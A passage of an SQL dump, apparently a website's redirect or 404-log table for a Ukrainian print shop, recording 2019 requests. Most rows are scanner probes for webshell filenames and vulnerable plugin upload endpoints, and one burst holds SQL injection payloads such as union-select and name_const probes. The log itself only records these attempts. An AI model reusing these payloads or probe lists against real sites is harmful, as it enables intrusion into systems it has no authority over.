09:28:21','0000-00-00 00:00:00',301),(14837,'https://ekvatorprint.com.ua/wp-register.php',NULL,'','',6,0,'2019-05-23 09:37:12','0000-00-00 00:00:00',301),(14838,'https://ekvatorprint.com.ua/cache.php',NULL,'','',14,0,'2019-05-23 17:49:36','0000-00-00 00:00:00',301),(14839,'https://ekvatorprint.com.ua/administrator/templates/isis/ext.php',NULL,'','',4,0,'2019-05-23 20:11:20','0000-00-00 00:00:00',301),(14840,'https://ekvatorprint.com.ua/wp-content/plugins/fluid_forms/file-upload/server/php/index.php',NULL,'http://ekvatorprint.com.ua/wp-content/plugins/fluid_forms/file-upload/server/php/index.php','',2,0,'2019-05-24 21:53:09','0000-00-00 00:00:00',301),(14841,'https://ekvatorprint.com.ua/null',NULL,'','',77,0,'2019-05-26 12:35:16','0000-00-00 00:00:00',301),(14842,'https://ekvatorprint.com.ua/wp-content/plugins/gravityforms/',NULL,'http://ekvatorprint.com.ua/wp-content/plugins/gravityforms/','',1,0,'2019-05-26 17:08:19','0000-00-00 00:00:00',301),(14843,'https://ekvatorprint.com.ua/app',NULL,'','',4,0,'2019-05-27 07:38:46','0000-00-00 00:00:00',301),(14844,'http://ekvatorprint.com.ua/wp-content/plugins/simple-ads-manager/readme.txt',NULL,'http://ekvatorprint.com.ua/wp-content/plugins/simple-ads-manager/readme.txt','',1,0,'2019-05-27 08:40:19','0000-00-00 00:00:00',301),(14845,'https://ekvatorprint.com.ua/wp-content/plugins/mm-forms-community/includes/doajaxfileupload.php',NULL,'http://ekvatorprint.com.ua/wp-content/plugins/mm-forms-community/includes/doajaxfileupload.php','',4,0,'2019-05-27 23:06:01','0000-00-00 00:00:00',301),(14846,'http://ekvatorprint.com.ua/wp-content/plugins/dzs-portfolio/admin/dzsuploader/upload.js',NULL,'http://ekvatorprint.com.ua/wp-content/plugins/dzs-portfolio/admin/dzsuploader/upload.js','',1,0,'2019-05-28 11:04:50','0000-00-00 00:00:00',301),(14847,'https://ekvatorprint.com.ua/installation/language/en-gb/en-gb.xml',NULL,'','',6,0,'2019-05-28 16:10:21','0000-00-00 00:00:00',301),(14848,'https://ekvatorprint.com.ua/installation/language/nb-no/nb-no.xml',NULL,'','',1,0,'2019-05-28 16:10:23','0000-00-00 00:00:00',301),(14849,'https://ekvatorprint.com.ua/readme.md',NULL,'','',2,0,'2019-05-28 16:10:25','0000-00-00 00:00:00',301),(14850,'https://ekvatorprint.com.ua/installation/language/fr-fr/fr-fr.xml',NULL,'','',2,0,'2019-05-28 16:10:26','0000-00-00 00:00:00',301),(14851,'https://ekvatorprint.com.ua/installation/language/it-it/it-it.xml',NULL,'','',2,0,'2019-05-28 16:10:29','0000-00-00 00:00:00',301),(14852,'https://ekvatorprint.com.ua/installation/language/th-th/th-th.xml',NULL,'','',1,0,'2019-05-28 16:10:30','0000-00-00 00:00:00',301),(14853,'https://ekvatorprint.com.ua/wp-content/plugins/work-the-flow-file-upload/public/assets/jquery-file-upload-9.5.0/server/php/index.php',NULL,'http://ekvatorprint.com.ua/wp-content/plugins/work-the-flow-file-upload/public/assets/jQuery-File-Upload-9.5.0/server/php/index.php','',1,0,'2019-05-29 08:37:09','0000-00-00 00:00:00',301),(14854,'https://ekvatorprint.com.ua/printing-on-canvashttps:/ekvatorprint.com.ua/printing-on-canvas',NULL,'','',14,0,'2019-05-29 10:05:11','0000-00-00 00:00:00',301),(14855,'https://ekvatorprint.com.ua/index.php?option=com_contact&view=contact&id=9',NULL,'','',4,0,'2019-05-29 17:22:45','0000-00-00 00:00:00',301),(14856,'https://ekvatorprint.com.ua/index.php?option=com_contact&view=contact&id=10',NULL,'','',4,0,'2019-05-29 17:22:45','0000-00-00 00:00:00',301),(14857,'https://ekvatorprint.com.ua/index.php?option=com_contact&view=contact&id=7',NULL,'','',9,0,'2019-05-29 17:22:46','0000-00-00 00:00:00',301),(14858,'https://ekvatorprint.com.ua/index.php?option=com_contact&view=contact&id=6',NULL,'','',9,0,'2019-05-29 17:22:46','0000-00-00 00:00:00',301),(14859,'https://ekvatorprint.com.ua/index.php?option=com_contact&view=contact&id=2',NULL,'','',9,0,'2019-05-29 17:22:46','0000-00-00 00:00:00',301),(14860,'https://ekvatorprint.com.ua/index.php?option=com_contact&view=contact&id=5',NULL,'','',9,0,'2019-05-29 17:22:46','0000-00-00 00:00:00',301),(14861,'https://ekvatorprint.com.ua/index.php?option=com_contact&view=contact&id=3',NULL,'','',9,0,'2019-05-29 17:22:46','0000-00-00 00:00:00',301),(14862,'https://ekvatorprint.com.ua/index.php?option=com_contact&view=contact&id=4',NULL,'','',9,0,'2019-05-29 17:22:46','0000-00-00 00:00:00',301),(14863,'https://ekvatorprint.com.ua/index.php?option=com_contact&view=contact&id=8',NULL,'','',4,0,'2019-05-29 17:22:46','0000-00-00 00:00:00',301),(14864,'https://ekvatorprint.com.ua/wp-content/plugins/easyrotator-for-wordpress/prv8.php',NULL,'','',1,0,'2019-05-29 19:11:46','0000-00-00 00:00:00',301),(14865,'http://ekvatorprint.com.ua/wp-content/themes/atom/uploadify/uploadify.css',NULL,'http://ekvatorprint.com.ua/wp-content/themes/atom/uploadify/uploadify.css','',1,0,'2019-05-30 11:17:20','0000-00-00 00:00:00',301),(14866,'https://ekvatorprint.com.ua/components/com_b2jcontact/',NULL,'','',3,0,'2019-05-30 15:12:45','0000-00-00 00:00:00',301),(14867,'http://ekvatorprint.com.ua/wp-content/themes/headway-201/style.css',NULL,'http://ekvatorprint.com.ua/wp-content/themes/headway-201/style.css','',1,0,'2019-05-31 20:55:26','0000-00-00 00:00:00',301),(14868,'https://ekvatorprint.com.ua/wp-admin/css/colors/blue/theme.php',NULL,'','',1,0,'2019-06-01 00:44:52','0000-00-00 00:00:00',301),(14869,'http://ekvatorprint.com.ua/wp-content/themes/headway-202/style.css',NULL,'http://ekvatorprint.com.ua/wp-content/themes/headway-202/style.css','',1,0,'2019-06-01 07:46:21','0000-00-00 00:00:00',301),(14870,'https://ekvatorprint.com.ua/connectors/system/phpthumb.php',NULL,'','',1,0,'2019-06-02 04:42:09','0000-00-00 00:00:00',301),(14871,'http://ekvatorprint.com.ua/chrome-extension:/mbckjcfnjmoiinpgddefodcighgikkgn/common/ui/fonts/fonts.css',NULL,'','',1,0,'2019-06-03 06:42:20','0000-00-00 00:00:00',301),(14872,'http://ekvatorprint.com.ua/wp-content/themes/headway-207/style.css',NULL,'http://ekvatorprint.com.ua/wp-content/themes/headway-207/style.css','',1,0,'2019-06-03 10:02:37','0000-00-00 00:00:00',301),(14873,'https://ekvatorprint.com.ua/wp-content/themes/multimedia1/server/php/',NULL,'http://ekvatorprint.com.ua/wp-content/themes/multimedia1/server/php/','',1,0,'2019-06-03 11:39:36','0000-00-00 00:00:00',301),(14874,'https://ekvatorprint.com.ua/price\"',NULL,'','',1,0,'2019-06-03 12:34:17','0000-00-00 00:00:00',301),(14875,'https://ekvatorprint.com.ua/\"',NULL,'','',2,0,'2019-06-03 12:34:17','0000-00-00 00:00:00',301),(14876,'https://ekvatorprint.com.ua/price2121121121212.1',NULL,'','',1,0,'2019-06-03 12:34:18','0000-00-00 00:00:00',301),(14877,'https://ekvatorprint.com.ua/2121121121212.1',NULL,'','',1,0,'2019-06-03 12:34:18','0000-00-00 00:00:00',301),(14878,'https://ekvatorprint.com.ua/price and 1=1',NULL,'','',1,0,'2019-06-03 12:34:19','0000-00-00 00:00:00',301),(14879,'https://ekvatorprint.com.ua/ and 1=1',NULL,'','',1,0,'2019-06-03 12:34:19','0000-00-00 00:00:00',301),(14880,'https://ekvatorprint.com.ua/ and 1>1',NULL,'','',1,0,'2019-06-03 12:34:19','0000-00-00 00:00:00',301),(14881,'https://ekvatorprint.com.ua/price and 1>1',NULL,'','',1,0,'2019-06-03 12:34:19','0000-00-00 00:00:00',301),(14882,'https://ekvatorprint.com.ua/price\' and \'x\'=\'x',NULL,'','',1,0,'2019-06-03 12:34:20','0000-00-00 00:00:00',301),(14883,'https://ekvatorprint.com.ua/\' and \'x\'=\'x',NULL,'','',1,0,'2019-06-03 12:34:20','0000-00-00 00:00:00',301),(14884,'https://ekvatorprint.com.ua/price\' and \'x\'=\'y',NULL,'','',1,0,'2019-06-03 12:34:20','0000-00-00 00:00:00',301),(14885,'https://ekvatorprint.com.ua/\' and \'x\'=\'y',NULL,'','',1,0,'2019-06-03 12:34:20','0000-00-00 00:00:00',301),(14886,'https://ekvatorprint.com.ua/price\" and \"x\"=\"x',NULL,'','',1,0,'2019-06-03 12:34:21','0000-00-00 00:00:00',301),(14887,'https://ekvatorprint.com.ua/\" and \"x\"=\"x',NULL,'','',1,0,'2019-06-03 12:34:21','0000-00-00 00:00:00',301),(14888,'https://ekvatorprint.com.ua/price\" and \"x\"=\"y',NULL,'','',1,0,'2019-06-03 12:34:21','0000-00-00 00:00:00',301),(14889,'https://ekvatorprint.com.ua/\" and \"x\"=\"y',NULL,'','',1,0,'2019-06-03 12:34:22','0000-00-00 00:00:00',301),(14890,'https://ekvatorprint.com.ua/price999999.1 union select unhex(hex(version())) -- and 1=1',NULL,'','',1,0,'2019-06-03 12:34:22','0000-00-00 00:00:00',301),(14891,'https://ekvatorprint.com.ua/999999.1 union select unhex(hex(version())) -- and 1=1',NULL,'','',1,0,'2019-06-03 12:34:23','0000-00-00 00:00:00',301),(14892,'https://ekvatorprint.com.ua/price99999\' union select unhex(hex(version())) -- \'x\'=\'x',NULL,'','',1,0,'2019-06-03 12:34:23','0000-00-00 00:00:00',301),(14893,'https://ekvatorprint.com.ua/99999\' union select unhex(hex(version())) -- \'x\'=\'x',NULL,'','',1,0,'2019-06-03 12:34:24','0000-00-00 00:00:00',301),(14894,'https://ekvatorprint.com.ua/99999\" union select unhex(hex(version())) -- \"x\"=\"x',NULL,'','',1,0,'2019-06-03 12:34:24','0000-00-00 00:00:00',301),(14895,'https://ekvatorprint.com.ua/price99999\" union select unhex(hex(version())) -- \"x\"=\"x',NULL,'','',1,0,'2019-06-03 12:34:25','0000-00-00 00:00:00',301),(14896,'https://ekvatorprint.com.ua/ or (1,2)=(select*from(select name_const(char(105,113,118,117,113,90,75,85,88,112),1),name_const(char(105,113,118,117,113,90,75,85,88,112),1))a) -- and 1=1',NULL,'','',1,0,'2019-06-03 12:34:25','0000-00-00 00:00:00',301),(14897,'https://ekvatorprint.com.ua/price or (1,2)=(select*from(select name_const(char(116,80,108,111,104,69,89,81,76,120),1),name_const(char(116,80,108,111,104,69,89,81,76,120),1))a) -- and 1=1',NULL,'','',1,0,'2019-06-03 12:34:25','0000-00-00 00:00:00',301),(14898,'https://ekvatorprint.com.ua/\' or (1,2)=(select*from(select name_const(char(105,113,118,117,113,90,75,85,88,112),1),name_const(char(105,113,118,117,113,90,75,85,88,112),1))a) -- \'x\'=\'x',NULL,'','',1,0,'2019-06-03 12:34:25','0000-00-00 00:00:00',301),(14899,'https://ekvatorprint.com.ua/price\' or (1,2)=(select*from(select name_const(char(116,80,108,111,104,69,89,81,76,120),1),name_const(char(116,80,108,111,104,69,89,81,76,120),1))a) -- \'x\'=\'x',NULL,'','',1,0,'2019-06-03 12:34:26','0000-00-00 00:00:00',301),(14900,'https://ekvatorprint.com.ua/\" or (1,2)=(select*from(select name_const(char(105,113,118,117,113,90,75,85,88,112),1),name_const(char(105,113,118,117,113,90,75,85,88,112),1))a) -- \"x\"=\"x',NULL,'','',1,0,'2019-06-03 12:34:26','0000-00-00 00:00:00',301),(14901,'https://ekvatorprint.com.ua/price\" or (1,2)=(select*from(select name_const(char(116,80,108,111,104,69,89,81,76,120),1),name_const(char(116,80,108,111,104,69,89,81,76,120),1))a) -- \"x\"=\"x',NULL,'','',1,0,'2019-06-03 12:34:26','0000-00-00 00:00:00',301),(14902,'http://ekvatorprint.com.ua/wp-content/themes/headway-208/style.css',NULL,'http://ekvatorprint.com.ua/wp-content/themes/headway-208/style.css','',1,0,'2019-06-04 05:57:54','0000-00-00 00:00:00',301),(14903,'http://ekvatorprint.com.ua/wp-content/themes/headway-209/style.css',NULL,'http://ekvatorprint.com.ua/wp-content/themes/headway-209/style.css','',1,0,'2019-06-04 15:51:17','0000-00-00 00:00:00',301),(14904,'http://ekvatorprint.com.ua/wp-content/themes/headway-2010/style.css',NULL,'http://ekvatorprint.com.ua/wp-content/themes/headway-2010/style.css','',1,0,'2019-06-05 07:18:42','0000-00-00 00:00:00',301),(14905,'http://ekvatorprint.com.ua/wp-content/themes/headway-2012/style.css',NULL,'http://ekvatorprint.com.ua/wp-content/themes/headway-2012/style.css','',1,0,'2019-06-06 08:51:56','0000-00-00 00:00:00',301),(14906,'https://ekvatorprint.com.ua/images/portfolio/plotternaya-podrezka/плоттерная',NULL,'','',1,0,'2019-06-07 06:40:20','0000-00-00 00:00:00',301),(14907,'https://ekvatorprint.com.ua/wp-main.php',NULL,'','',5,0,'2019-06-07 18:52:43','0000-00-00 00:00:00',301),(14908,'https://ekvatorprint.com.ua/.git/config',NULL,'','',13,0,'2019-06-08 10:02:42','0000-00-00 00:00:00',301),(14909,'https://ekvatorprint.com.ua/tags.php',NULL,'http://site.ru','',9,0,'2019-06-08 12:16:43','0000-00-00 00:00:00',301),(14910,'https://ekvatorprint.com.ua/rois.php',NULL,'http://site.ru','',6,0,'2019-06-08 12:18:09','0000-00-00 00:00:00',301),(14911,'https://ekvatorprint.com.ua/content-post.php',NULL,'http://site.ru','',18,0,'2019-06-08 12:18:54','0000-00-00 00:00:00',301),(14912,'https://ekvatorprint.com.ua/wp-system.php',NULL,'http://site.ru','',8,0,'2019-06-08 12:31:00','0000-00-00 00:00:00',301),(14913,'https://ekvatorprint.com.ua/seter.php',NULL,'http://site.ru','',10,0,'2019-06-08 12:45:03','0000-00-00 00:00:00',301),(14914,'https://ekvatorprint.com.ua/mide.php',NULL,'http://site.ru','',4,0,'2019-06-08 12:46:16','0000-00-00 00:00:00',301),(14915,'https://ekvatorprint.com.ua/assets/images/blackhat.php',NULL,'http://site.ru','',5,0,'2019-06-08 12:47:17','0000-00-00 00:00:00',301),(14916,'https://ekvatorprint.com.ua/aul.php',NULL,'http://site.ru','',5,0,'2019-06-08 12:47:51','0000-00-00 00:00:00',301),(14917,'https://ekvatorprint.com.ua/wp-logout.php',NULL,'http://site.ru','',10,0,'2019-06-08 13:13:56','0000-00-00 00:00:00',301),(14918,'https://ekvatorprint.com.ua/wp-system.php.suspected',NULL,'http://site.ru','',2,0,'2019-06-08 13:23:36','0000-00-00 00:00:00',301),(14919,'https://ekvatorprint.com.ua/hx.php',NULL,'http://site.ru','',7,0,'2019-06-08 13:25:11','0000-00-00 00:00:00',301),(14920,'https://ekvatorprint.com.ua/popup-pomo.php',NULL,'http://site.ru','',7,0,'2019-06-08 14:03:31','0000-00-00 00:00:00',301),(14921,'https://ekvatorprint.com.ua/assets/images/wp-console.php',NULL,'http://site.ru','',6,0,'2019-06-08 14:03:45','0000-00-00 00:00:00',301),(14922,'https://ekvatorprint.com.ua/0.php',NULL,'http://site.ru','',16,0,'2019-06-08 15:24:45','0000-00-00 00:00:00',301),(14923,'https://ekvatorprint.com.ua/options/popup-pomo.php',NULL,'http://site.ru','',8,0,'2019-06-08 15:52:59','0000-00-00 00:00:00',301),(14924,'https://ekvatorprint.com.ua/xmliipc.php',NULL,'http://site.ru','',8,0,'2019-06-08 16:20:30','0000-00-00 00:00:00',301),(14925,'https://ekvatorprint.com.ua/authorize.php',NULL,'http://site.ru','',5,0,'2019-06-08 18:12:51','0000-00-00 00:00:00',301),(14926,'https://ekvatorprint.com.ua/wp-blog-posts.php',NULL,'http://site.ru','',5,0,'2019-06-08 18:41:31','0000-00-00 00:00:00',301),(14927,'https://ekvatorprint.com.ua/tools/popup-pomo.php',NULL,'http://site.ru','',5,0,'2019-06-08 19:06:03','0000-00-00 00:00:00',301),(14928,'https://ekvatorprint.com.ua/assets/images/content-post.php',NULL,'http://site.ru','',13,0,'2019-06-08 20:53:48','0000-00-00 00:00:00',301),(14929,'https://ekvatorprint.com.ua/wp-cofigs.php.suspected',NULL,'http://site.ru','',12,0,'2019-06-08 21:28:33','0000-00-00 00:00:00',301),(14930,'https://ekvatorprint.com.ua/mini.php',NULL,'http://site.ru','',22,0,'2019-06-08 21:30:23','0000-00-00 00:00:00',301),(14931,'https://ekvatorprint.com.ua/yusa.php',NULL,'http://site.ru','',7,0,'2019-06-08 22:19:41','0000-00-00 00:00:00',301),(14932,'https://ekvatorprint.com.ua/404.php',NULL,'http://site.ru','',26,0,'2019-06-08 22:36:37','0000-00-00 00:00:00',301),(14933,'https://ekvatorprint.com.ua/postnew/popup-pomo.php',NULL,'http://site.ru','',14,0,'2019-06-08 22:39:25','0000-00-00 00:00:00',301),(14934,'https://ekvatorprint.com.ua/inc.php',NULL,'http://site.ru','',2,0,'2019-06-08 22:41:46','0000-00-00 00:00:00',301),(14935,'https://ekvatorprint.com.ua/wp-settings.php',NULL,'','',1,0,'2019-06-09 00:54:49','0000-00-00 00:00:00',301),(14936,'https://ekvatorprint.com.ua/xmlrpz.php',NULL,'http://site.ru','',12,0,'2019-06-09 05:33:54','0000-00-00 00:00:00',301),(14937,'https://ekvatorprint.com.ua/cache/content-post.php',NULL,'http://site.ru','',24,0,'2019-06-09 05:36:49','0000-00-00 00:00:00',301),(14938,'https://ekvatorprint.com.ua/qedw362nv2nvlqxm2lxgof',NULL,'','',1,0,'2019-06-09 05:58:01','0000-00-00 00:00:00',301),(14939,'https://ekvatorprint.com.ua/ass.php',NULL,'http://site.ru','',4,0,'2019-06-09 06:03:52','0000-00-00 00:00:00',301),(14940,'https://ekvatorprint.com.ua/administrator/logo_img.php',NULL,'http://site.ru','',2,0,'2019-06-09 06:05:46','0000-00-00 00:00:00',301),(14941,'https://ekvatorprint.com.ua/wp-models.php',NULL,'http://site.ru','',4,0,'2019-06-09 06:26:51','0000-00-00 00:00:00',301),(14942,'https://ekvatorprint.com.ua/baws.php',NULL,'http://site.ru','',3,0,'2019-06-09 06:30:56','0000-00-00 00:00:00',301),(14943,'https://ekvatorprint.com.ua/wp-wpphp.php',NULL,'http://site.ru','',10,0,'2019-06-09 06:40:38','0000-00-00 00:00:00',301),(14944,'https://ekvatorprint.com.ua/wp-seo.php',NULL,'http://site.ru','',6,0,'2019-06-09 06:58:16','0000-00-00 00:00:00',301),(14945,'https://ekvatorprint.com.ua/wp-cofigs.php',NULL,'http://site.ru','',8,0,'2019-06-09 08:41:49','0000-00-00 00:00:00',301),(14946,'https://ekvatorprint.com.ua/f.php',NULL,'http://site.ru','',11,0,'2019-06-09 09:32:30','0000-00-00 00:00:00',301),(14947,'https://ekvatorprint.com.ua/00.php',NULL,'http://site.ru','',5,0,'2019-06-09 09:33:37','0000-00-00 00:00:00',301),(14948,'https://ekvatorprint.com.ua/framework.php',NULL,'http://site.ru','',4,0,'2019-06-09 09:57:31','0000-00-00 00:00:00',301),(14949,'https://ekvatorprint.com.ua/manager/popup-pomo.php',NULL,'http://site.ru','',5,0,'2019-06-09 10:30:45','0000-00-00 00:00:00',301),(14950,'https://ekvatorprint.com.ua/mhbgf.php',NULL,'http://site.ru','',7,0,'2019-06-09 10:53:13','0000-00-00 00:00:00',301),(14951,'https://ekvatorprint.com.ua/logo_img.php',NULL,'http://site.ru','',8,0,'2019-06-09 11:03:37','0000-00-00 00:00:00',301),(14952,'http://ekvatorprint.com.ua/wp-content/themes/headway-2013/style.css',NULL,'http://ekvatorprint.com.ua/wp-content/themes/headway-2013/style.css','',1,0,'2019-06-09 13:30:32','0000-00-00 00:00:00',301),(14953,'https://ekvatorprint.com.ua/a.php',NULL,'http://site.ru','',37,0,'2019-06-09 14:25:05','0000-00-00 00:00:00',301),(14954,'https://ekvatorprint.com.ua/pasts.php',NULL,'http://site.ru','',4,0,'2019-06-09 14:26:38','0000-00-00 00:00:00',301),(14955,'https://ekvatorprint.com.ua/logo_img.php.suspected',NULL,'http://site.ru','',3,0,'2019-06-09 14:27:28','0000-00-00 00:00:00',301),(14956,'https://ekvatorprint.com.ua/cgi.php',NULL,'http://site.ru','',3,0,'2019-06-09 14:37:26','0000-00-00 00:00:00',301),(14957,'https://ekvatorprint.com.ua/general/popup-pomo.php',NULL,'http://site.ru','',9,0,'2019-06-09 14:53:23','0000-00-00 00:00:00',301),(14958,'https://ekvatorprint.com.ua/pamelas.php',NULL,'http://site.ru','',6,0,'2019-06-09 15:07:19','0000-00-00 00:00:00',301),(14959,'https://ekvatorprint.com.ua/about.php',NULL,'http://site.ru','',39,0,'2019-06-09 15:18:58','0000-00-00 00:00:00',301),(14960,'https://ekvatorprint.com.ua/phpmail/popup-pomo.php',NULL,'http://site.ru','',7,0,'2019-06-09 15:19:55','0000-00-00 00:00:00',301),(14961,'https://ekvatorprint.com.ua/permalink/popup-pomo.php',NULL,'http://site.ru','',8,0,'2019-06-09 15:57:46','0000-00-00 00:00:00',301),(14962,'https://ekvatorprint.com.ua/license.php',NULL,'http://site.ru','',48,0,'2019-06-09 16:11:28','0000-00-00 00:00:00',301),(14963,'https://ekvatorprint.com.ua/wp-xmlrpc.php',NULL,'http://site.ru','',5,0,'2019-06-09 16:37:16','0000-00-00 00:00:00',301),(14964,'https://ekvatorprint.com.ua/_.php',NULL,'http://site.ru','',10,0,'2019-06-09 16:44:31','0000-00-00 00:00:00',301),(14965,'https://ekvatorprint.com.ua/content-post.php.suspected',NULL,'http://site.ru','',22,0,'2019-06-09 17:54:20','0000-00-00 00:00:00',301),(14966,'https://ekvatorprint.com.ua/user.php',NULL,'http://site.ru','',8,0,'2019-06-09 17:55:19','0000-00-00 00:00:00',301),(14967,'https://ekvatorprint.com.ua/wp-caches.php',NULL,'http://site.ru','',6,0,'2019-06-09 18:01:16','0000-00-00 00:00:00',301),(14968,'https://ekvatorprint.com.ua/css.php',NULL,'http://site.ru','',13,0,'2019-06-09 18:03:40','0000-00-00 00:00:00',301),(14969,'https://ekvatorprint.com.ua/mixi.php',NULL,'http://site.ru','',4,0,'2019-06-09 18:58:10','0000-00-00 00:00:00',301),(14970,'https://ekvatorprint.com.ua/wp-updats.php',NULL,'http://site.ru','',6,0,'2019-06-09 19:39:29','0000-00-00 00:00:00',301),(14971,'https://ekvatorprint.com.ua/meta.php',NULL,'http://site.ru','',7,0,'2019-06-09 22:23:41','0000-00-00 00:00:00',301),(14972,'https://ekvatorprint.com.ua/js.php',NULL,'http://site.ru','',13,0,'2019-06-09 22:58:45','0000-00-00 00:00:00',301),(14973,'https://ekvatorprint.com.ua/info.php',NULL,'http://site.ru','',79,0,'2019-06-10 03:44:46','0000-00-00 00:00:00',301),(14974,'https://ekvatorprint.com.ua/wp-press.php',NULL,'http://site.ru','',6,0,'2019-06-10 03:48:37','0000-00-00 00:00:00',301),(14975,'https://ekvatorprint.com.ua/term/popup-pomo.php',NULL,'http://site.ru','',1,0,'2019-06-10 03:51:06','0000-00-00 00:00:00',301),(14976,'https://ekvatorprint.com.ua/readme.php',NULL,'http://site.ru','',11,0,'2019-06-10 04:10:08','0000-00-00 00:00:00',301),(14977,'https://ekvatorprint.com.ua/parseopml/popup-pomo.php',NULL,'http://site.ru','',2,0,'2019-06-10 04:34:15','0000-00-00 00:00:00',301),(14978,'https://ekvatorprint.com.ua/newsleter.php',NULL,'http://site.ru','',9,0,'2019-06-10 04:42:05','0000-00-00 00:00:00',301),(14979,'https://ekvatorprint.com.ua/maint/popup-pomo.php',NULL,'http://site.ru','',13,0,'2019-06-10 05:03:26','0000-00-00 00:00:00',301),(14980,'https://ekvatorprint.com.ua/widgets/popup-pomo.php',NULL,'http://site.ru','',4,0,'2019-06-10 05:06:09','0000-00-00 00:00:00',301),(14981,'https://ekvatorprint.com.ua/system.php',NULL,'http://site.ru','',5,0,'2019-06-10 05:54:14','0000-00-00 00:00:00',301),(14982,'https://ekvatorprint.com.ua/food.php',NULL,'http://site.ru','',4,0,'2019-06-10 06:43:43','0000-00-00 00:00:00',301),(14983,'https://ekvatorprint.com.ua/b.php',NULL,'http://site.ru','',17,0,'2019-06-10 06:48:37','0000-00-00 00:00:00',301),(14984,'https://ekvatorprint.com.ua/default.php',NULL,'http://site.ru','',5,0,'2019-06-10 08:08:10','0000-00-00 00:00:00',301),(14985,'http://ekvatorprint.com.ua/wp-content/themes/headway-2014/style.css',NULL,'http://ekvatorprint.com.ua/wp-content/themes/headway-2014/style.css','',1,0,'2019-06-10 08:10:42','0000-00-00 00:00:00',301),(14986,'https://ekvatorprint.com.ua/libraries/joomla/template/mark.php',NULL,'http://site.ru','',13,0,'2019-06-10 08:58:22','0000-00-00 00:00:00',301),(14987,'https://ekvatorprint.com.ua/wp-updats.php.suspected',NULL,'http://site.ru','',3,0,'2019-06-10 09:07:56','0000-00-00 00:00:00',301),(14988,'https://ekvatorprint.com.ua/sec.php',NULL,'http://site.ru','',6,0,'2019-06-10 09:17:11','0000-00-00 00:00:00',301),(14989,'https://ekvatorprint.com.ua/x.php',NULL,'http://site.ru','',35,0,'2019-06-10 09:20:00','0000-00-00 00:00:00',301),(14990,'https://ekvatorprint.com.ua/logs/logs.php',NULL,'http://site.ru','',4,0,'2019-06-10 09:22:14','0000-00-00 00:00:00',301),(14991,'https://ekvatorprint.com.ua/wp-post.php',NULL,'http://site.ru','',7,0,'2019-06-10 10:38:36','0000-00-00 00:00:00',301),(14992,'https://ekvatorprint.com.ua/wp-backup.php',NULL,'http://site.ru','',7,0,'2019-06-10 11:08:33','0000-00-00 00:00:00',301),(14993,'https://ekvatorprint.com.ua/conf.ini.php',NULL,'http://site.ru','',6,0,'2019-06-10 11:52:21','0000-00-00 00:00:00',301),(14994,'https://ekvatorprint.com.ua/wp-info.php',NULL,'http://site.ru','',29,0,'2019-06-10 12:41:36','0000-00-00 00:00:00',301),(14995,'https://ekvatorprint.com.ua/modules/mod_ariimageslidersa/098.php',NULL,'http://site.ru','',9,0,'2019-06-10 12:45:45','0000-00-00 00:00:00',301),(14996,'https://ekvatorprint.com.ua/modx.php',NULL,'http://site.ru','',6,0,'2019-06-10 13:19:09','0000-00-00 00:00:00',301),(14997,'https://ekvatorprint.com.ua/bigm.php',NULL,'http://site.ru','',6,0,'2019-06-10 13:37:42','0000-00-00 00:00:00',301),(14998,'https://ekvatorprint.com.ua/k.php',NULL,'http://site.ru','',12,0,'2019-06-10 14:33:08','0000-00-00 00:00:00',301),(14999,'https://ekvatorprint.com.ua/profile/popup-pomo.php',NULL,'http://site.ru','',3,0,'2019-06-10 15:30:05','0000-00-00 00:00:00',301),(15000,'https://ekvatorprint.com.ua/ws.php',NULL,'http://site.ru','',12,0,'2019-06-10 16:36:37','0000-00-00 00:00:00',301),(15001,'https://ekvatorprint.com.ua/admin_login.php',NULL,'http://site.ru','',10,0,'2019-06-10 17:04:47','0000-00-00 00:00:00',301),(15002,'https://ekvatorprint.com.ua/wp-blogs.php',NULL,'http://site.ru','',6,0,'2019-06-10 18:16:44','0000-00-00 00:00:00',301),(15003,'https://ekvatorprint.com.ua/setupconfig/popup-pomo.php',NULL,'http://site.ru','',10,0,'2019-06-10 19:04:32','0000-00-00 00:00:00',301),(15004,'https://ekvatorprint.com.ua/bacot.php',NULL,'http://site.ru','',9,0,'2019-06-10 21:45:01','0000-00-00 00:00:00',301),(15005,'https://ekvatorprint.com.ua/wp-mains.php',NULL,'http://site.ru','',10,0,'2019-06-10 22:56:31','0000-00-00 00:00:00',301),(15006,'https://ekvatorprint.com.ua/h4ck_.php',NULL,'http://site.ru','',5,0,'2019-06-11 02:00:21','0000-00-00 00:00:00',301),(15007,'http://ekvatorprint.com.ua/wp-content/themes/headway-2015/style.css',NULL,'http://ekvatorprint.com.ua/wp-content/themes/headway-2015/style.css','',1,0,'2019-06-11 14:34:45','0000-00-00 00:00:00',301),(15008,'http://ekvatorprint.com.ua/images/thumbnails/images/stories/vinil-s-fill.jpg',NULL,'https://ekvatorprint.com.ua/?gclid=EAIaIQobChMIrrqwto7i4gIVENKaCh0k5gQ6EAEYAiAAEgKZ7vD_BwE','',1,0,'2019-06-11 19:00:17','0000-00-00 00:00:00',301),(15009,'http://ekvatorprint.com.ua/wp-content/themes/headway/style.css',NULL,'http://ekvatorprint.com.ua/wp-content/themes/headway/style.css','',1,0,'2019-06-12 07:10:55','0000-00-00 00:00:00',301),(15010,'https://ekvatorprint.com.ua/ciosans.php',NULL,'http://site.ru','',3,0,'2019-06-12 10:54:03','0000-00-00 00:00:00',301),(15011,'https://ekvatorprint.com.ua/header_img.php.suspected',NULL,'http://site.ru','',7,0,'2019-06-12 11:57:05','0000-00-00 00:00:00',301),(15012,'https://ekvatorprint.com.ua/components/logo_img.php',NULL,'http://site.ru','',6,0,'2019-06-12 11:58:00','0000-00-00 00:00:00',301),(15013,'https://ekvatorprint.com.ua/components/com_search/models/mark.php',NULL,'http://site.ru','',10,0,'2019-06-12 12:51:22','0000-00-00 00:00:00',301),(15014,'https://ekvatorprint.com.ua/esjfglis.php',NULL,'http://site.ru','',1,0,'2019-06-12 13:19:29','0000-00-00 00:00:00',301),(15015,'https://ekvatorprint.com.ua/m.php',NULL,'http://site.ru','',18,0,'2019-06-12 13:49:31','0000-00-00 00:00:00',301),(15016,'https://ekvatorprint.com.ua/administrator/components/com_admin/controllers/theme.php',NULL,'http://site.ru','',5,0,'2019-06-12 13:51:13','0000-00-00 00:00:00',301),(15017,'https://ekvatorprint.com.ua/bl.php',NULL,'http://site.ru','',9,0,'2019-06-12 16:00:54','0000-00-00 00:00:00',301),(15018,'https://ekvatorprint.com.ua/print.php',NULL,'http://site.ru','',4,0,'2019-06-12 16:28:25','0000-00-00 00:00:00',301),(15019,'https://ekvatorprint.com.ua/do.php',NULL,'http://site.ru','',4,0,'2019-06-12 17:23:29','0000-00-00 